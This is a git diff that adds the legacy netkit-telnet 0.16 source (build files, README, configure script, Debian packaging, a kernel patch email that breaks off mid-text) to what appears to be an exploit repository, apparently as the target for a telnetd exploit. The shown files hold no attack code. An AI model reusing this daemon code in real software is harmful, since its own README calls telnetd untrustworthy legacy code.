compilation rules (don't use make builtins) + +%.o: %.c + $(CC) $(CFLAGS) $< -c + +%.o: %.cc + $(CXX) $(CXXFLAGS) $< -c + diff --git a/exploits/7350855-netkit/netkit-telnet-0.16/Makefile b/exploits/7350855-netkit/netkit-telnet-0.16/Makefile new file mode 100644 index 0000000..1942aee --- /dev/null +++ b/exploits/7350855-netkit/netkit-telnet-0.16/Makefile @@ -0,0 +1,20 @@ +# You can do "make SUB=blah" to make only a few, or edit here, or both +# You can also run make directly in the subdirs you want. + +SUB = telnet telnetd + +%.build: + (cd $(patsubst %.build, %, $@) && $(MAKE)) + +%.install: + (cd $(patsubst %.install, %, $@) && $(MAKE) install) + +%.clean: + (cd $(patsubst %.clean, %, $@) && $(MAKE) clean) + +all: $(patsubst %, %.build, $(SUB)) +install: $(patsubst %, %.install, $(SUB)) +clean: $(patsubst %, %.clean, $(SUB)) + +distclean: clean + rm -f MCONFIG diff --git a/exploits/7350855-netkit/netkit-telnet-0.16/README b/exploits/7350855-netkit/netkit-telnet-0.16/README new file mode 100644 index 0000000..c9b4f49 --- /dev/null +++ b/exploits/7350855-netkit/netkit-telnet-0.16/README @@ -0,0 +1,102 @@ +This is netkit-telnet-0.16. + +This package updates netkit-telnet-0.14. + +If you're reading this off a CD, go right away and check the net +archives for later versions and security fixes. + +Contents: + telnet Client for telnet protocol + telnetd Daemon for telnet protocol + +Note: These programs do not provide encryption or strong +authentication of network connections. As such, their use for remote +logins is discouraged. The "ssh" protocol and package can be used +instead. + +Requires: + Working compiler, libc, and kernel, and a recent version of + ncurses or libtermcap. + +Security: + This release probably does not contain new security fixes. On + the other hand, vast amounts of suspicious pointer manipulation + in telnetd were cleaned up, so it is quite likely that this + version is less dangerous than previous ones. + + In any event, telnetd is evil legacy code and is not + trustworthy - do not run it unless you absolutely need it. + + + netkit-telnet-0.14 contained a fix for a set of remote (and + possibly serious) denial of service attacks possible against + older versions of the telnet daemon. + + Do not under any circumstances use telnetd older than + NetKit-0.09! + +DEC Alpha: + The currently available Compaq C compiler does not provide + a C++ compiler, so it cannot compile telnet. Compiling + telnetd it may produce a few warnings, but they should be + harmless. + +Installation: + Do "./configure --help" and decide what options you want. The + defaults should be suitable for most Linux systems. Then run + the configure script. + + Do "make" to compile. + Then (as root) do "make install". + + Save a backup copy of any mission-critical program in case the + new one doesn't work, and so forth. We warned you. + + *** If you have an old kernel, you may need to apply the enclosed + pty-hang patch to it. I don't unfortunately know at the moment + which kernel versions need the patch, but current 2.0.x and + 2.2.x should be ok without it. + + The following test will tell you if you need the patch: telnet + to localhost, do "cat >/dev/null", and type 256 characters + without any newlines. If you need the patch, telnetd will hang + completely at this point. If it refuses to accept more input, + but does not hang, you do not need the patch. + +Bugs: + Please make sure the header files in /usr/include match the + libc version installed in /lib and /usr/lib. If you have weird + problems this is the most likely culprit. + + Also, before reporting a bug, be sure you're working with the + latest version. + + If something doesn't compile for you, fix it and send diffs. + If you can't, send the compiler's error output. + + If it compiles but doesn't work, send as complete a bug report as + you can. Patches and fixes are welcome, as long as you describe + adequately what they're supposed to fix. Please, one patch per + distinct fix. Please do NOT send the whole archive back or + reindent the source. + + Be sure to send all correspondence in e-mail. Postings to netnews + will not be seen due to the enormous volume. + + Please don't report known bugs (see the BUGS file(s)) unless you + are including fixes. :-) + + Mail should be sent to: netbug@ftp.uk.linux.org + + +Note: please see http://www.hcs.harvard.edu/~dholland/computers/netkit.html +if you are curious why it's been so long since the last NetKit release. +(The short version is that I gave things to some other people, who let +them kind of slide.) + +I do not currently plan to continue maintaining NetKit; I am doing this +release and perhaps one or two more, and then I intend to give the source +tree to Red Hat or some similar organization for long-term maintenance. + +David A. Holland +12 December 1999 diff --git a/exploits/7350855-netkit/netkit-telnet-0.16/configure b/exploits/7350855-netkit/netkit-telnet-0.16/configure new file mode 100644 index 0000000..a17f8f5 --- /dev/null +++ b/exploits/7350855-netkit/netkit-telnet-0.16/configure @@ -0,0 +1,571 @@ +#!/bin/sh +# +# This file was generated by confgen version 2. +# Do not edit. +# + +PREFIX='/usr' +#EXECPREFIX='$PREFIX' +INSTALLROOT='' +BINMODE='755' +#DAEMONMODE='$BINMODE' +MANMODE='644' + +while [ x$1 != x ]; do case $1 in + + --help) + cat < __conftest.c + int main() { int class=0; return class; } +EOF + +if [ x"$CC" = x ]; then + echo -n 'Looking for a C compiler... ' + for TRY in egcs gcc g++ CC c++ cc; do + ( + $TRY __conftest.c -o __conftest || exit 1; + ./__conftest || exit 1; + ) >/dev/null 2>&1 || continue; + CC=$TRY + break; + done + if [ x"$CC" = x ]; then + echo 'failed.' + echo 'Cannot find a C compiler. Run configure with --with-c-compiler.' + rm -f __conftest* + exit + fi + echo "$CC" +else + echo -n 'Checking if C compiler works... ' + if ( + $CC __conftest.c -o __conftest || exit 1 + ./__conftest || exit 1 + ) >/dev/null 2>&1; then + echo 'yes' + else + echo 'no' + echo 'Compiler '"$CC"' does not exist or cannot compile C; try another.' + rm -f __conftest* + exit + fi +fi + +echo -n "Checking if $CC accepts gcc warnings... " +if ( + $CC $WARNINGS __conftest.c -o __conftest || exit 1 + ) >/dev/null 2>&1; then + echo 'yes' + CC_WARNINGS=1 +else + echo 'no' +fi + +cat << EOF > __conftest.cc + template class fnord { public: T x; fnord(T y) { x=y; }}; + int main() { fnord a(0); return a.x; } +EOF + +if [ x"$CXX" = x ]; then + echo -n 'Looking for a C++ compiler... ' + for TRY in egcs gcc g++ CC c++ cc; do + ( + $TRY __conftest.cc -o __conftest || exit 1; + ./__conftest || exit 1; + ) >/dev/null 2>&1 || continue; + CXX=$TRY + break; + done + if [ x"$CXX" = x ]; then + echo 'failed.' + echo 'Cannot find a C++ compiler. Run configure with --with-cpp-compiler.' + rm -f __conftest* + exit + fi + echo "$CXX" +else + echo -n 'Checking if C++ compiler works... ' + if ( + $CXX __conftest.cc -o __conftest || exit 1 + ./__conftest || exit 1 + ) >/dev/null 2>&1; then + echo 'yes' + else + echo 'no' + echo 'Compiler '"$CXX"' does not exist or cannot compile C++; try another.' + rm -f __conftest* + exit + fi +fi + +echo -n "Checking if $CXX accepts gcc warnings... " +if ( + $CXX $WARNINGS __conftest.cc -o __conftest || exit 1 + ) >/dev/null 2>&1; then + echo 'yes' + CXX_WARNINGS=1 +else + echo 'no' +fi + +if [ x$DEBUG != x ]; then + echo -n "Checking if $CC accepts -g... " + if ( + $CC -g __conftest.c -o __conftest + ) >/dev/null 2>&1; then + echo 'yes' + CFLAGS="$CFLAGS -g" + else + echo 'no' + fi +fi + +echo -n "Checking if $CC accepts -O2... " +if ( + $CC -O2 __conftest.c -o __conftest + ) >/dev/null 2>&1; then + echo 'yes' + CFLAGS="$CFLAGS -O2" +else + echo 'no' + echo -n "Checking if $CC accepts -O... " + if ( + $CC -O __conftest.c -o __conftest + ) >/dev/null 2>&1; then + echo 'yes' + CFLAGS="$CFLAGS -O" + else + echo 'no' + fi +fi + +if [ x"$CC" != x"$CXX" ]; then + if [ x$DEBUG != x ]; then + echo -n "Checking if $CXX accepts -g... " + if ( + $CXX -g __conftest.cc -o __conftest + ) >/dev/null 2>&1; then + echo 'yes' + CXXFLAGS="$CXXFLAGS -g" + else + echo 'no' + fi + + fi + echo -n "Checking if $CXX accepts -O2... " + if ( + $CXX -O2 __conftest.cc -o __conftest + ) >/dev/null 2>&1; then + echo 'yes' + CXXFLAGS="$CXXFLAGS -O2" + else + echo 'no' + echo -n "Checking if $CXX accepts -O... " + if ( + $CXX -O __conftest.cc -o __conftest + ) >/dev/null 2>&1; then + echo 'yes' + CXXFLAGS="$CXXFLAGS -O" + else + echo 'no' + fi + fi +else + CXXFLAGS="$CFLAGS" +fi +echo -n "Checking if $CXX accepts -fno-rtti... " +if ( + $CXX -fno-rtti __conftest.cc -o __conftest + ) >/dev/null 2>&1; then + echo 'yes' + CXXFLAGS="$CXXFLAGS -fno-rtti" +else + echo 'no' +fi + +echo -n "Checking if $CXX accepts -fno-exceptions... " +if ( + $CXX -fno-exceptions __conftest.cc -o __conftest + ) >/dev/null 2>&1; then + echo 'yes' + CXXFLAGS="$CXXFLAGS -fno-exceptions" +else + echo 'no' +fi + + +LDFLAGS= +LIBS= + +rm -f __conftest* + +################################################## + +echo -n 'Checking for BSD signal semantics... ' +cat <__conftest.cc +#include +#include +int count=0; +void handle(int foo) { count++; } +int main() { + int pid=getpid(); + signal(SIGINT, handle); + kill(pid,SIGINT); + kill(pid,SIGINT); + kill(pid,SIGINT); + if (count!=3) return 1; + return 0; +} + +EOF +if ( + $CXX $CXXFLAGS __conftest.cc -o __conftest || exit 1 + ./__conftest || exit 1 + ) >/dev/null 2>&1; then + echo 'yes' +else + if ( + $CXX $CXXFLAGS -D__USE_BSD_SIGNAL __conftest.cc -o __conftest || exit 1 + ./__conftest || exit 1 + ) >/dev/null 2>&1; then + echo '-D__USE_BSD_SIGNAL' + CFLAGS="$CFLAGS -D__USE_BSD_SIGNAL" + CXXFLAGS="$CXXFLAGS -D__USE_BSD_SIGNAL" + else + echo 'no' + echo 'This package needs BSD signal semantics to run.' + rm -f __conftest* + exit + fi +fi +rm -f __conftest* + +################################################## + +echo -n 'Checking for ncurses... ' +cat <__conftest.cc +#include +#include +#ifndef KEY_DOWN +syntax error. /* not ncurses */ +#endif +int main() { + endwin(); + return 0; +} + +EOF +if ( + $CXX $CXXFLAGS __conftest.cc -lncurses -o __conftest || exit 1 + ) >/dev/null 2>&1; then + echo 'yes' + NCURSES=1 +else + if ( + $CXX $CXXFLAGS -I/usr/include/ncurses __conftest.cc -lncurses -o __conftest || exit 1 + ) >/dev/null 2>&1; then + echo '-I/usr/include/ncurses' + CFLAGS="$CFLAGS -I/usr/include/ncurses" + CXXFLAGS="$CXXFLAGS -I/usr/include/ncurses" + NCURSES=1 + else + echo 'no' + fi +fi + +if [ x$NCURSES != x ]; then + LIBTERMCAP=-lncurses +else + echo -n 'Checking for traditional termcap... ' +cat <__conftest.cc +#include +#include +int main() { + tgetent(NULL, NULL); return 0; +} + +EOF + if ( + $CXX $CXXFLAGS __conftest.cc -ltermcap -o __conftest || exit 1 + ) >/dev/null 2>&1; then + echo '-ltermcap' + LIBTERMCAP=-ltermcap + else + echo 'not found' + echo 'This package needs termcap to run.' + rm -f __conftest* + exit + fi +fi +rm -f __conftest* + +################################################## + +echo -n 'Checking for GNU libc... ' +cat <__conftest.cc +#include +#if defined(__GLIBC__) && (__GLIBC__ >= 2) +int tester; +#endif +int main() { tester=6; return 0; } + +EOF +if ( + $CXX $CXXFLAGS __conftest.cc -o __conftest || exit 1 + ) >/dev/null 2>&1; then + echo 'yes' + USE_GLIBC=1 +else + echo 'no' +fi +rm -f __conftest* + +################################################## + +echo -n 'Checking for forkpty... ' +cat <__conftest.cc +#include +int main() { forkpty(0, 0, 0, 0); } + +EOF +if ( + $CXX $CXXFLAGS __conftest.cc -o __conftest || exit 1 + ) >/dev/null 2>&1; then + echo 'yes' +else + if ( + $CXX $CXXFLAGS __conftest.cc -lutil -o __conftest || exit 1 + ) >/dev/null 2>&1; then + echo '-lutil' + LIBS="$LIBS -lutil" + else + if ( + $CXX $CXXFLAGS __conftest.cc -lbsd -o __conftest || exit 1 + ) >/dev/null 2>&1; then + echo '-lbsd' + LIBBSD="-lbsd" + else + echo 'no' + echo 'This package requires forkpty.' + rm -f __conftest* + exit + fi + fi +fi +rm -f __conftest* + +################################################## + +echo -n 'Checking for logwtmp... ' +cat <__conftest.cc +#ifdef __cplusplus +extern "C" +#endif +void logwtmp(const char *, const char *, const char *); +int main() { logwtmp(0, 0, 0); } + +EOF +if ( + $CXX $CXXFLAGS __conftest.cc -o __conftest || exit 1 + ) >/dev/null 2>&1; then + echo 'yes' +else + if ( + $CXX $CXXFLAGS __conftest.cc -lutil -o __conftest || exit 1 + ) >/dev/null 2>&1; then + echo '-lutil' + LIBS="$LIBS -lutil" + else + if ( + $CXX $CXXFLAGS __conftest.cc -lbsd -o __conftest || exit 1 + ) >/dev/null 2>&1; then + echo '-lbsd' + LIBBSD="-lbsd" + else + echo 'no' + echo 'This package requires logwtmp.' + rm -f __conftest* + exit + fi + fi +fi +rm -f __conftest* + +################################################## + +echo -n 'Checking for snprintf declaration... ' +cat <__conftest.cc +#include +int main() { + void *x = (void *)snprintf; + printf("%lx", (long)x); + return 0; +} + +EOF +if ( + $CXX $CXXFLAGS __conftest.cc -o __conftest || exit 1 + ) >/dev/null 2>&1; then + echo 'ok' +else + if ( + $CXX $CXXFLAGS -D_GNU_SOURCE __conftest.cc -o __conftest || exit 1 + ./__conftest || exit 1 + ) >/dev/null 2>&1; then + echo '-D_GNU_SOURCE' + CFLAGS="$CFLAGS -D_GNU_SOURCE" + CXXFLAGS="$CXXFLAGS -D_GNU_SOURCE" + else + echo 'manual' + CFLAGS="$CFLAGS -DDECLARE_SNPRINTF" + CXXFLAGS="$CXXFLAGS -DDECLARE_SNPRINTF" + fi +fi +rm -f __conftest* + +echo -n 'Checking for snprintf implementation... ' +cat <__conftest.cc +#include +#include +#ifdef DECLARE_SNPRINTF +#ifdef __cplusplus +extern "C" +#endif /*__cplusplus*/ +int snprintf(char *, int, const char *, ...); +#endif /*DECLARE_SNPRINTF*/ +int main() { + char buf[32]; + snprintf(buf, 8, "%s", "1234567890"); + if (strlen(buf)!=7) return 1; + return 0; +} + +EOF +if ( + $CXX $CXXFLAGS __conftest.cc $(LIBBSD) -o __conftest || exit 1 + ./__conftest || exit 1 + ) >/dev/null 2>&1; then + echo 'ok' +else + if ( + $CXX $CXXFLAGS __conftest.cc -lsnprintf $(LIBBSD) -o __conftest || exit 1 + ./__conftest || exit 1 + ) >/dev/null 2>&1; then + echo '-lsnprintf' + LIBS="$LIBS -lsnprintf" + else + if ( + $CXX $CXXFLAGS __conftest.cc -ldb $(LIBBSD) -o __conftest || exit 1 + ./__conftest || exit 1 + ) >/dev/null 2>&1; then + echo '-ldb' + LIBS="$LIBS -ldb" + else + echo 'missing' + echo 'This package requires snprintf.' + rm -f __conftest* + exit + fi + fi +fi +rm -f __conftest* + +################################################## + +## libbsd should go last in case it's broken +if [ "x$LIBBSD" != x ]; then + LIBS="$LIBS $LIBBSD" +fi + +echo 'Generating MCONFIG...' +( + echo -n '# Generated by configure (confgen version 2) on ' + date + echo '#' + echo + + echo "BINDIR=$BINDIR" + echo "SBINDIR=$SBINDIR" + echo "MANDIR=$MANDIR" + echo "BINMODE=$BINMODE" + echo "DAEMONMODE=$DAEMONMODE" + echo "MANMODE=$MANMODE" + echo "PREFIX=$PREFIX" + echo "EXECPREFIX=$EXECPREFIX" + echo "INSTALLROOT=$INSTALLROOT" + echo "CC=$CC" + echo "CXX=$CXX" + if [ x$CC_WARNINGS != x ]; then + CFLAGS="$CFLAGS $WARNINGS" + fi + + if [ x$CXX_WARNINGS != x ]; then + CXXFLAGS="$CXXFLAGS $WARNINGS" + fi + + echo "CFLAGS=$CFLAGS" | sed 's/= */=/' + echo "CXXFLAGS=$CXXFLAGS" | sed 's/= */=/' + echo "LDFLAGS=$LDFLAGS" | sed 's/= */=/' + echo "LIBS=$LIBS" | sed 's/= */=/' + + echo "LIBTERMCAP=$LIBTERMCAP" + echo "USE_GLIBC=$USE_GLIBC" +) > MCONFIG + diff --git a/exploits/7350855-netkit/netkit-telnet-0.16/debian/changelog b/exploits/7350855-netkit/netkit-telnet-0.16/debian/changelog new file mode 100644 index 0000000..a15309b --- /dev/null +++ b/exploits/7350855-netkit/netkit-telnet-0.16/debian/changelog @@ -0,0 +1,139 @@ +netkit-telnet (0.16-4potato.1) stable; urgency=low + + * Fixed a memory allocation bug. + + -- Herbert Xu Fri, 22 Sep 2000 23:30:18 +1100 + +netkit-telnet (0.16-4) frozen unstable; urgency=low + + * Disabled signal handling that does not work (closes: #62388). Patches + that provide correct signal handling are welcome. + + -- Herbert Xu Mon, 24 Apr 2000 16:58:22 +1000 + +netkit-telnet (0.16-3) frozen unstable; urgency=medium + + * Restored the default to not being 8-bit clean since it breaks SunOS + (closes: #60352, #60386). People who need 8-bit cleanness should use -8. + * Made FHS compliant. + + -- Herbert Xu Wed, 15 Mar 2000 10:39:00 +1100 + +netkit-telnet (0.16-2) frozen unstable; urgency=low + + * Recompiled with libncurses5. + * Changed the permission of /usr/lib/telnetd/login to 4754 (closes: #58786). + * telnet is now 8-bit clean by default since it appeared to be so in slink, + albeit unintentionally (closes: #57685). + + -- Herbert Xu Sun, 12 Mar 2000 21:10:47 +1100 + +netkit-telnet (0.16-1) frozen unstable; urgency=low + + * New upstream release with security fixes. + * Run as root if devpts is not present. + + -- Herbert Xu Thu, 3 Feb 2000 13:42:29 +1100 + +netkit-telnet (0.14-9) unstable; urgency=low + + * Compile login with -g -O2 -Wall. + * Fixed path to default login in in.telnetd(8). + * Fixed usage() output (closes: #51498). + + -- Herbert Xu Tue, 30 Nov 1999 22:43:39 +1100 + +netkit-telnet (0.14-8) unstable; urgency=low + + * Call fatalperror() instead of fatal() when getpty() fails. + * Delete telnetd group before creating telnetd (closes: #46659). + + -- Herbert Xu Tue, 5 Oct 1999 17:52:36 +1000 + +netkit-telnet (0.14-7) unstable; urgency=low + + * Redirect stderr for group existence check to /dev/null. + + -- Herbert Xu Sat, 25 Sep 1999 22:00:31 +1000 + +netkit-telnet (0.14-6) unstable; urgency=low + + * Check for existence of user/group before removing (fixes #45651). + + -- Herbert Xu Tue, 21 Sep 1999 21:07:18 +1000 + +netkit-telnet (0.14-5) unstable; urgency=low + + * Depend on base-files (>= 2.1.8) for group utmp (fixes #44687). + + -- Herbert Xu Sat, 11 Sep 1999 12:53:08 +1000 + +netkit-telnet (0.14-4) unstable; urgency=low + + * Rebuilt with working fakeroot (fixes #44043, #44044). + + -- Herbert Xu Fri, 3 Sep 1999 20:32:28 +1000 + +netkit-telnet (0.14-3) unstable; urgency=medium + + * telnetd is now a member of utmp (fixes #43543). + * Call adduser with --quiet (fixes #43587). + * configure now works with egcs 2.95 (fixes #43580, #43747) + + -- Herbert Xu Thu, 2 Sep 1999 21:18:06 +1000 + +netkit-telnet (0.14-2) unstable; urgency=low + + * telnetd now depends on adduser and passwd (fixes #43515). + + -- Herbert Xu Thu, 26 Aug 1999 14:49:25 +1000 + +netkit-telnet (0.14-1) unstable; urgency=low + + * New upstream release. + * Installed the login wrapper (fixes #42092). + * Reopen logging if necessary (fixes #36149). + + -- Herbert Xu Tue, 24 Aug 1999 09:17:24 +1000 + +netkit-telnet (0.12-6) unstable; urgency=low + + * Applied patch from Matt McLean for openpty support (fixes #35629). + * Use glibc versions of logout/logwtmp. + + -- Herbert Xu Tue, 29 Jun 1999 14:16:14 +1000 + +netkit-telnet (0.12-5) unstable; urgency=low + + * Fixed a bug with hostnames longer than 64 characters (fixes #33559). + + -- Herbert Xu Tue, 16 Mar 1999 15:24:36 +1100 + +netkit-telnet (0.12-4) frozen unstable; urgency=low + + * Uploaded to slink. + + -- Herbert Xu Sun, 15 Nov 1998 15:04:40 +1100 + +netkit-telnet (0.12-3) unstable; urgency=low + + * Rebuilt with libncurses4. + + -- Herbert Xu Sun, 1 Nov 1998 19:38:49 +1100 + +netkit-telnet (0.12-2) unstable; urgency=low + + * Rebuilt with libstdc++2.9 (fixes #27789). + + -- Herbert Xu Thu, 15 Oct 1998 22:32:04 +1000 + +netkit-telnet (0.12-1) unstable; urgency=low + + * Initial Release. + + -- Herbert Xu Mon, 28 Sep 1998 16:50:43 +1000 + +Local variables: +mode: debian-changelog +add-log-mailing-address: "herbert@debian.org" +End: diff --git a/exploits/7350855-netkit/netkit-telnet-0.16/debian/control b/exploits/7350855-netkit/netkit-telnet-0.16/debian/control new file mode 100644 index 0000000..fe25130 --- /dev/null +++ b/exploits/7350855-netkit/netkit-telnet-0.16/debian/control @@ -0,0 +1,21 @@ +Source: netkit-telnet +Section: net +Priority: standard +Maintainer: Herbert Xu +Standards-Version: 3.0.1 + +Package: telnet +Architecture: any +Depends: ${shlibs:Depends} +Replaces: netstd +Description: The telnet client. + The telnet command is used for interactive communication with another host + using the TELNET protocol. + +Package: telnetd +Architecture: any +Depends: netbase, adduser, base-files (>= 2.1.8), ${shlibs:Depends} +Replaces: netstd +Description: The telnet server. + The in.telnetd program is a server which supports the DARPA telnet interactive + communication protocol. diff --git a/exploits/7350855-netkit/netkit-telnet-0.16/debian/copyright b/exploits/7350855-netkit/netkit-telnet-0.16/debian/copyright new file mode 100644 index 0000000..94881eb --- /dev/null +++ b/exploits/7350855-netkit/netkit-telnet-0.16/debian/copyright @@ -0,0 +1,18 @@ +This package was split from netstd by Herbert Xu herbert@debian.org on +Mon, 28 Sep 1998 16:50:43 +1000. + +netstd was created by Peter Tobias tobias@et-inf.fho-emden.de on +Wed, 20 Jul 1994 17:23:21 +0200. + +It was downloaded from ftp://ftp.uk.linux.org/pub/linux/Networking/telnet+ftp/. + +Copyright: + +Copyright (c) 1988, 1993 The Regents of the University of California. +Copyright (c) 1995 David A. Holland +Copyright (c) 1994 Peter Tobias (issue.net(5)) +Copyright (c) 1983, 1995 Eric P. Allman (setproctitle.[ch]) + +The license can be found at /usr/doc/copyright/BSD. + +$Id: copyright,v 1.2 2000/03/08 01:14:59 herbert Exp $ diff --git a/exploits/7350855-netkit/netkit-telnet-0.16/debian/dirs b/exploits/7350855-netkit/netkit-telnet-0.16/debian/dirs new file mode 100644 index 0000000..98d1583 --- /dev/null +++ b/exploits/7350855-netkit/netkit-telnet-0.16/debian/dirs @@ -0,0 +1,2 @@ +usr/bin +usr/share/man/man1 diff --git a/exploits/7350855-netkit/netkit-telnet-0.16/debian/docs b/exploits/7350855-netkit/netkit-telnet-0.16/debian/docs new file mode 100644 index 0000000..9632452 --- /dev/null +++ b/exploits/7350855-netkit/netkit-telnet-0.16/debian/docs @@ -0,0 +1,2 @@ +BUGS +README diff --git a/exploits/7350855-netkit/netkit-telnet-0.16/debian/login.c b/exploits/7350855-netkit/netkit-telnet-0.16/debian/login.c new file mode 100644 index 0000000..653129e --- /dev/null +++ b/exploits/7350855-netkit/netkit-telnet-0.16/debian/login.c @@ -0,0 +1,23 @@ +#include +#include +#include + +#ifndef _PATH_LOGIN +#define _PATH_LOGIN "/bin/login" +#endif + +int main(int argc, char **argv) +{ + while(argc--) { + if((argv[argc][0] == '-') + && (argv[argc][1] == 'f')) { + openlog("login.telnetd", LOG_PID, LOG_AUTHPRIV); + syslog(LOG_CRIT, "login.telnetd tried to use \"-f\""); + closelog(); + return 1; + } + } + setuid(geteuid()); + argv[0] = _PATH_LOGIN; + return execv(argv[0], argv); +} diff --git a/exploits/7350855-netkit/netkit-telnet-0.16/debian/rules b/exploits/7350855-netkit/netkit-telnet-0.16/debian/rules new file mode 100644 index 0000000..ef60a05 --- /dev/null +++ b/exploits/7350855-netkit/netkit-telnet-0.16/debian/rules @@ -0,0 +1,77 @@ +#!/usr/bin/make -f +# $Id: rules,v 1.6 2000/03/14 23:43:29 herbert Exp $ +# Sample debian/rules that uses debhelper. GNU copyright 1997 by Joey Hess. + +# Uncomment this to turn on verbose mode. +#export DH_VERBOSE=1 + +CFLAGS=-g -O2 -Wall + +build: build-stamp +build-stamp: debian/login + dh_testdir + + if [ ! -f MCONFIG ]; then ./configure --debug; fi + $(MAKE) + + touch build-stamp + +clean: + dh_testdir + dh_testroot + rm -f build-stamp install-stamp + + -$(MAKE) distclean + rm -f debian/login debian/login.o + + dh_clean + +install: install-stamp +install-stamp: build-stamp + dh_testdir + dh_testroot + dh_clean -k + dh_installdirs + + $(MAKE) -C telnet INSTALLROOT=`pwd`/debian/tmp MANDIR=/usr/share/man \ + install + $(MAKE) -C telnetd INSTALLROOT=`pwd`/debian/telnetd \ + MANDIR=/usr/share/man install + cp debian/login debian/telnetd/usr/lib/telnetd + + touch install-stamp + +# Build architecture-independent files here. +binary-indep: build install +# We have nothing to do by default. + +# Build architecture-dependent files here. +binary-arch: build install +# dh_testversion + dh_testdir + dh_testroot + dh_installdocs + dh_installexamples + dh_installmenu +# dh_installemacsen +# dh_installinit + dh_installcron +# dh_installmanpages +# dh_undocumented + dh_installchangelogs ChangeLog + dh_strip + dh_compress + dh_fixperms + dh_suidregister + dh_installdeb + dh_shlibdeps + dh_gencontrol +# dh_makeshlibs + dh_md5sums + dh_builddeb + +source diff: + @echo >&2 'source and diff are obsolete - use dpkg-source -b'; false + +binary: binary-indep binary-arch +.PHONY: build clean binary-indep binary-arch binary diff --git a/exploits/7350855-netkit/netkit-telnet-0.16/debian/telnetd.dirs b/exploits/7350855-netkit/netkit-telnet-0.16/debian/telnetd.dirs new file mode 100644 index 0000000..8759ade --- /dev/null +++ b/exploits/7350855-netkit/netkit-telnet-0.16/debian/telnetd.dirs @@ -0,0 +1,4 @@ +usr/lib/telnetd +usr/share/man/man5 +usr/share/man/man8 +usr/sbin diff --git a/exploits/7350855-netkit/netkit-telnet-0.16/debian/telnetd.postinst b/exploits/7350855-netkit/netkit-telnet-0.16/debian/telnetd.postinst new file mode 100644 index 0000000..6ff8f5c --- /dev/null +++ b/exploits/7350855-netkit/netkit-telnet-0.16/debian/telnetd.postinst @@ -0,0 +1,45 @@ +#!/bin/sh -e +# $Id: telnetd.postinst,v 1.9 2000/03/08 01:13:20 herbert Exp $ + +if ! id -u telnetd >/dev/null 2>&1; then + if sg telnetd -c true 2>/dev/null; then + groupdel telnetd + fi + adduser --quiet --system --group --home /usr/lib/telnetd telnetd +fi +adduser --quiet telnetd utmp +if [ -e /etc/suid.conf -a -x /usr/sbin/suidregister ]; then + suidregister -s telnetd /usr/lib/telnetd/login root telnetd 4754 +else + chown root.telnetd /usr/lib/telnetd/login + chmod 4754 /usr/lib/telnetd/login +fi + +if grep -q "^devpts " /proc/mounts; then + REMOVE="telnet stream tcp nowait root /usr/sbin/tcpd /usr/sbin/in.telnetd" + ADD="telnet stream tcp nowait telnetd.telnetd /usr/sbin/tcpd /usr/sbin/in.telnetd" +else + REMOVE="telnet stream tcp nowait telnetd.telnetd /usr/sbin/tcpd /usr/sbin/in.telnetd" + ADD="telnet stream tcp nowait root /usr/sbin/tcpd /usr/sbin/in.telnetd" +fi + +case "$1" in +abort-upgrade | abort-deconfigure | abort-remove) + update-inetd --enable telnet + ;; +configure) + if [ -n "$2" ] && dpkg --compare-versions "$2" ge 0.14-1 && + ! grep -q "^$REMOVE" /etc/inetd.conf; then + update-inetd --enable telnet + else + update-inetd --remove "$REMOVE" + update-inetd --group STANDARD --add "$ADD" + fi + ;; +*) + printf "$0: incorrect arguments: $*\n" >&2 + exit 1 + ;; +esac + +#DEBHELPER# diff --git a/exploits/7350855-netkit/netkit-telnet-0.16/debian/telnetd.postrm b/exploits/7350855-netkit/netkit-telnet-0.16/debian/telnetd.postrm new file mode 100644 index 0000000..cc0531c --- /dev/null +++ b/exploits/7350855-netkit/netkit-telnet-0.16/debian/telnetd.postrm @@ -0,0 +1,29 @@ +#!/bin/sh -e +# $Id: telnetd.postrm,v 1.6 1999/11/25 21:27:08 herbert Exp $ + +if [ -e /etc/suid.conf -a -x /usr/sbin/suidunregister ]; then + suidunregister -s telnetd /usr/lib/telnetd/login +fi + +case "$1" in +abort-install | remove | abort-upgrade | upgrade | failed-upgrade | disappear) + ;; +purge) + if id telnetd >/dev/null 2>&1; then + userdel telnetd + fi + if sg telnetd -c true 2>/dev/null; then + groupdel telnetd + fi + # If netbase is not installed, then we don't need to do the remove. + if command -v update-inetd >/dev/null 2>&1; then + update-inetd --remove "telnet .* /usr/sbin/in.telnetd" + fi + ;; +*) + echo "$0: incorrect arguments: $*" >&2 + exit 1 + ;; +esac + +#DEBHELPER# diff --git a/exploits/7350855-netkit/netkit-telnet-0.16/debian/telnetd.prerm b/exploits/7350855-netkit/netkit-telnet-0.16/debian/telnetd.prerm new file mode 100644 index 0000000..47a26d2 --- /dev/null +++ b/exploits/7350855-netkit/netkit-telnet-0.16/debian/telnetd.prerm @@ -0,0 +1,9 @@ +#!/bin/sh -e +# $Id: telnetd.prerm,v 1.2 1999/08/27 10:45:45 herbert Exp $ + +# If netbase is not installed, then we don't need to do the remove. +if command -v update-inetd >/dev/null 2>&1; then + update-inetd --disable telnet +fi + +#DEBHELPER# diff --git a/exploits/7350855-netkit/netkit-telnet-0.16/pty-hang.patch b/exploits/7350855-netkit/netkit-telnet-0.16/pty-hang.patch new file mode 100644 index 0000000..850f4b9 --- /dev/null +++ b/exploits/7350855-netkit/netkit-telnet-0.16/pty-hang.patch @@ -0,0 +1,99 @@ +From whawes@star.net Sun May 25 11:17:36 1997 +Received: from venus.star.net (root@venus.star.net [199.232.114.5]) by hcs.harvard.edu (8.8.5/8.8.3) with ESMTP id LAA15293 for ; Sun, 25 May 1997 11:17:35 -0400 (EDT) +Received: from hawes (bos221p.star.net [199.232.112.221]) by venus.star.net (8.8.5/8.7.3) with ESMTP id LAA29775; Sun, 25 May 1997 11:17:08 -0400 +Message-ID: <33885894.B2043F5E@star.net> +Date: Sun, 25 May 1997 11:19:48 -0400 +From: Bill Hawes +X-Mailer: Mozilla 4.0b3 [en] (WinNT; I) +MIME-Version: 1.0 +To: David Holland , + Alan Cox , + Peter Tobias , + "Theodore Ts'o" +Subject: kernel patch to fix telnetd deadlock +X-Priority: 3 (Normal) +Content-Type: multipart/mixed; boundary="------------B47A35BD86775A5D9DA0F308" +Status: RO + +This is a multi-part message in MIME format. +--------------B47A35BD86775A5D9DA0F308 +Content-Type: text/plain; charset=us-ascii +Content-Transfer-Encoding: 7bit + +Attached is a patch for drivers/char/n_tty.c that fixes the telnetd +deadlock when more than 256 chars are typed without a newline. With +this patch in place, the total of typed-ahead and entered commands is +still limited to 256 chars, but telnetd comes back to life when the +buffer is emptied. + +Here's what the problem was: +telnetd does a select() on the master side of a pty to see when it's +safe to write a character without blocking. + +The 